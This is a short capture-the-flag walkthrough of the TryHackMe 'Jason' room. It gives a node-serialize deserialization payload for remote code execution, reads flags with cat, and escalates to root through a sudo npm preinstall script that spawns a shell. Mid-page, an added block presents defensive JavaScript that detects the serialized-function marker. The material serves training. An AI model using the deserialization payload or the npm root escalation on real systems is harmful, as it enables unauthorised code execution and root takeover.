TryHackMe Jason Room

We are Horror LLC, we specialize in horror, but one of the scarier aspects of our company is our front-end webserver. We can’t launch our site in its current state and our level of concern regarding our cybersecurity is growing exponentially. We ask that you perform a thorough penetration test and try to compromise the root account. There are no rules for this engagement. Good luck!

In JavaScript everything is a terrible mistake. Thanks to @Luma for testing the room.

Scan the machine

rustscan -a 10.10.44.51

Investigate Web server

firefox http://10.10.44.51

Analyse Source Code

Investigate Requests

10.10.82.11

Get a reverse Shell

nodejs reverse shell
{"rce":"_$$ND_FUNC$$_function (){ 'nodejsshell_code' }()"}
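
The defensive counterpart to the payload above, added here as an example and not part of the original write-up: `_$$ND_FUNC$$_` is the prefix node-serialize puts on serialized functions, and its `unserialize()` rebuilds such strings with `eval()`. The code below parses client input with `JSON.parse` only, rejects any string carrying the marker, and enforces a field allow-list; the `email` field, `ALLOWED_FIELDS` and the function names are assumptions made for illustration.

```javascript
'use strict';

// Prefix node-serialize puts on serialized functions; its unserialize()
// rebuilds such strings with eval(), the behaviour this page's payload needs.
const FUNC_MARKER = '_$$ND_FUNC$$_';

// Hypothetical schema for this example: field name -> expected typeof.
const ALLOWED_FIELDS = new Map([['email', 'string']]);

// Walk the parsed value and record the path of every string with the marker.
function findFunctionMarkers(value, path = '$', hits = []) {
  if (typeof value === 'string') {
    if (value.includes(FUNC_MARKER)) hits.push(path);
  } else if (value !== null && typeof value === 'object') {
    for (const [key, child] of Object.entries(value)) {
      findFunctionMarkers(child, `${path}.${key}`, hits);
    }
  }
  return hits;
}

// Treat client input as data only: JSON.parse never executes code.
function parseUntrusted(raw) {
  let data;
  try {
    data = JSON.parse(raw);
  } catch {
    return { ok: false, reason: 'invalid JSON' };
  }
  if (data === null || typeof data !== 'object' || Array.isArray(data)) {
    return { ok: false, reason: 'expected a JSON object' };
  }
  // Check the marker first so attack attempts are told apart from bad input.
  const hits = findFunctionMarkers(data);
  if (hits.length > 0) {
    return { ok: false, reason: 'serialized function', paths: hits };
  }
  for (const [key, val] of Object.entries(data)) {
    if (ALLOWED_FIELDS.get(key) !== typeof val) {
      return { ok: false, reason: `unexpected field ${key}` };
    }
  }
  return { ok: true, data };
}

// Constructed sample inputs; the function body is a harmless placeholder.
const benign = JSON.stringify({ email: 'user@example.com' });
const tagged = JSON.stringify({ rce: FUNC_MARKER + "function (){ 'placeholder' }()" });
console.log(parseUntrusted(benign), parseUntrusted(tagged));
```

The `paths` array in a rejection is worth logging: a marker arriving in a request field is a strong signal of a deserialization probe rather than a malformed client.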


Get User Flag

cat /home/dylan/user.txt

Escalate Privileges

Search for npm on GTFOBins, which gives the following:

export TERM=xterm
TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
sudo npm -C $TF --unsafe-perm i

Get Root Flag

cat /root/root.txt

Room THM Jason

NodeJs Shell Generator

RFS (104)